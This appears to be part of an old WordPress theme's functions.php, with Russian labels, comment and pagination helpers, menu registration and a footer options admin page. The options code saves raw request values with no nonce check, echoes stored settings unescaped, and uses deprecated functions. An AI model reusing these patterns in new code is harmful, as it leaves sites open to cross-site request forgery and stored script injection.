if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Подвал", "Подвал", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' - настройки сохранены.</strong></p></div>';
?>
<div class="wrap">
	<h2>Подвал</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
